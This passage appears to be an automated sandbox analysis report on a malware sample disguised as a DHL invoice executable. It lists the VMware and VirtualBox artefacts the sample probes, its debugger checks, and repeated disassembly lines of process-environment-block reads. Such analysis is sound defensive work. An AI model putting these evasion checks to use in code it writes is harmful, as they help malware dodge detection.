            Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareP
            Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B400001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
            Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIP
            Source: rQkTBkrqhGpTBn.exe, 0000000E.00000002.4139670159.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
            Source: firefox.exe, 0000000F.00000002.2371356969.000001DA5EB2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
            Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0578096E rdtsc 4_2_0578096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00417753 LdrLoadDll,4_2_00417753
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577656A mov eax, dword ptr fs:[00000030h]4_2_0577656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577656A mov eax, dword ptr fs:[00000030h]4_2_0577656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577656A mov eax, dword ptr fs:[00000030h]4_2_0577656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748550 mov eax, dword ptr fs:[00000030h]4_2_05748550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748550 mov eax, dword ptr fs:[00000030h]4_2_05748550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750535 mov eax, dword ptr fs:[00000030h]4_2_05750535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750535 mov eax, dword ptr fs:[00000030h]4_2_05750535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750535 mov eax, dword ptr fs:[00000030h]4_2_05750535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750535 mov eax, dword ptr fs:[00000030h]4_2_05750535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750535 mov eax, dword ptr fs:[00000030h]4_2_05750535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750535 mov eax, dword ptr fs:[00000030h]4_2_05750535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E53E mov eax, dword ptr fs:[00000030h]4_2_0576E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E53E mov eax, dword ptr fs:[00000030h]4_2_0576E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E53E mov eax, dword ptr fs:[00000030h]4_2_0576E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E53E mov eax, dword ptr fs:[00000030h]4_2_0576E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E53E mov eax, dword ptr fs:[00000030h]4_2_0576E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D6500 mov eax, dword ptr fs:[00000030h]4_2_057D6500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814500 mov eax, dword ptr fs:[00000030h]4_2_05814500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814500 mov eax, dword ptr fs:[00000030h]4_2_05814500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814500 mov eax, dword ptr fs:[00000030h]4_2_05814500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814500 mov eax, dword ptr fs:[00000030h]4_2_05814500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814500 mov eax, dword ptr fs:[00000030h]4_2_05814500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814500 mov eax, dword ptr fs:[00000030h]4_2_05814500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814500 mov eax, dword ptr fs:[00000030h]4_2_05814500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E5E7 mov eax, dword ptr fs:[00000030h]4_2_0576E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E5E7 mov eax, dword ptr fs:[00000030h]4_2_0576E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E5E7 mov eax, dword ptr fs:[00000030h]4_2_0576E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E5E7 mov eax, dword ptr fs:[00000030h]4_2_0576E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E5E7 mov eax, dword ptr fs:[00000030h]4_2_0576E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E5E7 mov eax, dword ptr fs:[00000030h]4_2_0576E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E5E7 mov eax, dword ptr fs:[00000030h]4_2_0576E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576E5E7 mov eax, dword ptr fs:[00000030h]4_2_0576E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057425E0 mov eax, dword ptr fs:[00000030h]4_2_057425E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577C5ED mov eax, dword ptr fs:[00000030h]4_2_0577C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577C5ED mov eax, dword ptr fs:[00000030h]4_2_0577C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057465D0 mov eax, dword ptr fs:[00000030h]4_2_057465D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A5D0 mov eax, dword ptr fs:[00000030h]4_2_0577A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A5D0 mov eax, dword ptr fs:[00000030h]4_2_0577A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E5CF mov eax, dword ptr fs:[00000030h]4_2_0577E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E5CF mov eax, dword ptr fs:[00000030h]4_2_0577E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057645B1 mov eax, dword ptr fs:[00000030h]4_2_057645B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057645B1 mov eax, dword ptr fs:[00000030h]4_2_057645B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C05A7 mov eax, dword ptr fs:[00000030h]4_2_057C05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C05A7 mov eax, dword ptr fs:[00000030h]4_2_057C05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C05A7 mov eax, dword ptr fs:[00000030h]4_2_057C05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E59C mov eax, dword ptr fs:[00000030h]4_2_0577E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05742582 mov eax, dword ptr fs:[00000030h]4_2_05742582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05742582 mov ecx, dword ptr fs:[00000030h]4_2_05742582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05774588 mov eax, dword ptr fs:[00000030h]4_2_05774588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576A470 mov eax, dword ptr fs:[00000030h]4_2_0576A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576A470 mov eax, dword ptr fs:[00000030h]4_2_0576A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576A470 mov eax, dword ptr fs:[00000030h]4_2_0576A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057CC460 mov ecx, dword ptr fs:[00000030h]4_2_057CC460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576245A mov eax, dword ptr fs:[00000030h]4_2_0576245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573645D mov eax, dword ptr fs:[00000030h]4_2_0573645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E443 mov eax, dword ptr fs:[00000030h]4_2_0577E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E443 mov eax, dword ptr fs:[00000030h]4_2_0577E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E443 mov eax, dword ptr fs:[00000030h]4_2_0577E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E443 mov eax, dword ptr fs:[00000030h]4_2_0577E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E443 mov eax, dword ptr fs:[00000030h]4_2_0577E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E443 mov eax, dword ptr fs:[00000030h]4_2_0577E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E443 mov eax, dword ptr fs:[00000030h]4_2_0577E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E443 mov eax, dword ptr fs:[00000030h]4_2_0577E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573E420 mov eax, dword ptr fs:[00000030h]4_2_0573E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573E420 mov eax, dword ptr fs:[00000030h]4_2_0573E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573E420 mov eax, dword ptr fs:[00000030h]4_2_0573E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573C427 mov eax, dword ptr fs:[00000030h]4_2_0573C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C6420 mov eax, dword ptr fs:[00000030h]4_2_057C6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C6420 mov eax, dword ptr fs:[00000030h]4_2_057C6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C6420 mov eax, dword ptr fs:[00000030h]4_2_057C6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C6420 mov eax, dword ptr fs:[00000030h]4_2_057C6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C6420 mov eax, dword ptr fs:[00000030h]4_2_057C6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C6420 mov eax, dword ptr fs:[00000030h]4_2_057C6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C6420 mov eax, dword ptr fs:[00000030h]4_2_057C6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05778402 mov eax, dword ptr fs:[00000030h]4_2_05778402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05778402 mov eax, dword ptr fs:[00000030h]4_2_05778402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05778402 mov eax, dword ptr fs:[00000030h]4_2_05778402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057404E5 mov ecx, dword ptr fs:[00000030h]4_2_057404E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057744B0 mov ecx, dword ptr fs:[00000030h]4_2_057744B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057CA4B0 mov eax, dword ptr fs:[00000030h]4_2_057CA4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057464AB mov eax, dword ptr fs:[00000030h]4_2_057464AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748770 mov eax, dword ptr fs:[00000030h]4_2_05748770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750770 mov eax, dword ptr fs:[00000030h]4_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057CE75D mov eax, dword ptr fs:[00000030h]4_2_057CE75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05740750 mov eax, dword ptr fs:[00000030h]4_2_05740750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782750 mov eax, dword ptr fs:[00000030h]4_2_05782750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782750 mov eax, dword ptr fs:[00000030h]4_2_05782750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4755 mov eax, dword ptr fs:[00000030h]4_2_057C4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577674D mov esi, dword ptr fs:[00000030h]4_2_0577674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577674D mov eax, dword ptr fs:[00000030h]4_2_0577674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577674D mov eax, dword ptr fs:[00000030h]4_2_0577674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577273C mov eax, dword ptr fs:[00000030h]4_2_0577273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577273C mov ecx, dword ptr fs:[00000030h]4_2_0577273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577273C mov eax, dword ptr fs:[00000030h]4_2_0577273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BC730 mov eax, dword ptr fs:[00000030h]4_2_057BC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577C720 mov eax, dword ptr fs:[00000030h]4_2_0577C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577C720 mov eax, dword ptr fs:[00000030h]4_2_0577C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05740710 mov eax, dword ptr fs:[00000030h]4_2_05740710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05770710 mov eax, dword ptr fs:[00000030h]4_2_05770710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577C700 mov eax, dword ptr fs:[00000030h]4_2_0577C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057447FB mov eax, dword ptr fs:[00000030h]4_2_057447FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057447FB mov eax, dword ptr fs:[00000030h]4_2_057447FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057627ED mov eax, dword ptr fs:[00000030h]4_2_057627ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057627ED mov eax, dword ptr fs:[00000030h]4_2_057627ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057627ED mov eax, dword ptr fs:[00000030h]4_2_057627ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057CE7E1 mov eax, dword ptr fs:[00000030h]4_2_057CE7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574C7C0 mov eax, dword ptr fs:[00000030h]4_2_0574C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C07C3 mov eax, dword ptr fs:[00000030h]4_2_057C07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057407AF mov eax, dword ptr fs:[00000030h]4_2_057407AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772674 mov eax, dword ptr fs:[00000030h]4_2_05772674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A660 mov eax, dword ptr fs:[00000030h]4_2_0577A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A660 mov eax, dword ptr fs:[00000030h]4_2_0577A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575C640 mov eax, dword ptr fs:[00000030h]4_2_0575C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E627 mov eax, dword ptr fs:[00000030h]4_2_0575E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05776620 mov eax, dword ptr fs:[00000030h]4_2_05776620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05778620 mov eax, dword ptr fs:[00000030h]4_2_05778620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574262C mov eax, dword ptr fs:[00000030h]4_2_0574262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782619 mov eax, dword ptr fs:[00000030h]4_2_05782619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE609 mov eax, dword ptr fs:[00000030h]4_2_057BE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575260B mov eax, dword ptr fs:[00000030h]4_2_0575260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575260B mov eax, dword ptr fs:[00000030h]4_2_0575260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575260B mov eax, dword ptr fs:[00000030h]4_2_0575260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575260B mov eax, dword ptr fs:[00000030h]4_2_0575260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575260B mov eax, dword ptr fs:[00000030h]4_2_0575260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575260B mov eax, dword ptr fs:[00000030h]4_2_0575260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575260B mov eax, dword ptr fs:[00000030h]4_2_0575260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE6F2 mov eax, dword ptr fs:[00000030h]4_2_057BE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE6F2 mov eax, dword ptr fs:[00000030h]4_2_057BE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE6F2 mov eax, dword ptr fs:[00000030h]4_2_057BE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE6F2 mov eax, dword ptr fs:[00000030h]4_2_057BE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C06F1 mov eax, dword ptr fs:[00000030h]4_2_057C06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C06F1 mov eax, dword ptr fs:[00000030h]4_2_057C06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0577A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A6C7 mov eax, dword ptr fs:[00000030h]4_2_0577A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057766B0 mov eax, dword ptr fs:[00000030h]4_2_057766B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577C6A6 mov eax, dword ptr fs:[00000030h]4_2_0577C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05744690 mov eax, dword ptr fs:[00000030h]4_2_05744690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05744690 mov eax, dword ptr fs:[00000030h]4_2_05744690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580866E mov eax, dword ptr fs:[00000030h]4_2_0580866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580866E mov eax, dword ptr fs:[00000030h]4_2_0580866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746154 mov eax, dword ptr fs:[00000030h]4_2_05746154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746154 mov eax, dword ptr fs:[00000030h]4_2_05746154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573C156 mov eax, dword ptr fs:[00000030h]4_2_0573C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D8158 mov eax, dword ptr fs:[00000030h]4_2_057D8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D4144 mov eax, dword ptr fs:[00000030h]4_2_057D4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D4144 mov eax, dword ptr fs:[00000030h]4_2_057D4144
